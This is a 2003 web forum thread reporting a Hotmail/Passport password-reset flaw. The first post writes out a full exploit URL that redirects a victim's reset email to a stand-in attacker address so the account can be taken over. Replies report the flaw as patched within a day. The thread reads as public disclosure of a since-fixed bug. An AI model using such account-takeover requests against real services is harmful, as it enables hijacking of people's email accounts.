Web Wiz - Green Windows Web Hosting
Web Wiz Homepage Search Web Wiz

  New Posts New Posts RSS Feed - Hotmail Security Hole
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Hotmail Security Hole
 Post Reply Post Reply
Author
  Topic Search Topic Search  Topic Options Topic Options
hockenpj View Drop Down
Groupie
Groupie
Avatar

Joined: 10 February 2003
Location: Belgium
Status: Offline
Points: 149 		Post Options Post Options   Thanks (0) Thanks(0)   Quote hockenpj Quote  Post ReplyReply Direct Link To This Post Topic: Hotmail Security Hole
    Posted: 09 May 2003 at 1:59pm

Hotmail & Passport (.NET Accounts) Vulnerability

There is a very serious and stupid vulnerability or badcoding in Hotmail / Passports (.NET Accounts)

I tried sending e-mails several times to Hotmail / Passport contact addresses, but always met with the NLP bots.

I guess I dont need to go in details of how cruical and important Hotmail / Passports .NET Account passport is to anyone.

You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.

It is so simple that it is funny.

All you got to do is hit the following in your browser:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

And you'll get an email on attacker@attacker.com asking you to click on a url something like this:

http://register.passport.net/emailerror.srf?lc=1033

From that url, you can reset the password and I don't think I need to say anything more about it.
Back to Top
Gullanian View Drop Down
Senior Member
Senior Member
Avatar

Joined: 04 January 2002
Location: England
Status: Offline
Points: 4373 		Post Options Post Options   Thanks (0) Thanks(0)   Quote Gullanian Quote  Post ReplyReply Direct Link To This Post Posted: 09 May 2003 at 5:15pm
oops!
Back to Top
Gullanian View Drop Down
Senior Member
Senior Member
Avatar

Joined: 04 January 2002
Location: England
Status: Offline
Points: 4373 		Post Options Post Options   Thanks (0) Thanks(0)   Quote Gullanian Quote  Post ReplyReply Direct Link To This Post Posted: 09 May 2003 at 5:21pm
doesnt work hehe
Back to Top
hockenpj View Drop Down
Groupie
Groupie
Avatar

Joined: 10 February 2003
Location: Belgium
Status: Offline
Points: 149 		Post Options Post Options   Thanks (0) Thanks(0)   Quote hockenpj Quote  Post ReplyReply Direct Link To This Post Posted: 10 May 2003 at 3:06am

I worked for me but I have just tired it again and it doesn't work so they must have made a patch for it!

I was able to reset the password on my account and then send the new password to a non-hotmail account of my choice.
Back to Top
the boss View Drop Down
Senior Member
Senior Member
Avatar

Joined: 19 January 2003
Location: Saudi Arabia
Status: Offline
Points: 1727 		Post Options Post Options   Thanks (0) Thanks(0)   Quote the boss Quote  Post ReplyReply Direct Link To This Post Posted: 11 May 2003 at 1:05am
doesnt work for me too...
Back to Top
Bunce View Drop Down
Senior Member
Senior Member
Avatar

Joined: 10 April 2002
Location: Australia
Status: Offline
Points: 846 		Post Options Post Options   Thanks (0) Thanks(0)   Quote Bunce Quote  Post ReplyReply Direct Link To This Post Posted: 11 May 2003 at 3:09am

They fixed it Thursday night.  Apparently the guy who found it tried to email them about the bug 10 times and gave up so he posted in on the net.  Was only public for a day before it was fixed.

Apparently no-one else had expoited it before then.
There have been many, many posts made throughout the world...
This was one of them.
Back to Top
 Post Reply Post Reply

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 12.08
Copyright ©2001-2026 Web Wiz Ltd.

Become a Fan on Facebook Follow us on X Connect with us on LinkedIn Web Wiz Blogs
About Web Wiz | Contact Web Wiz | Terms & Conditions | Cookies | Privacy Notice

Web Wiz is the trading name of Web Wiz Ltd. Company registration No. 05977755. Registered in England and Wales.
Registered office: Web Wiz Ltd, Unit 18, The Glenmore Centre, Fancy Road, Poole, Dorset, BH12 4FB, UK.

Prices exclude VAT at 20% unless otherwise stated. VAT No. GB988999105 - $, € prices shown as a guideline only.

Copyright ©2001-2026 Web Wiz Ltd. All rights reserved.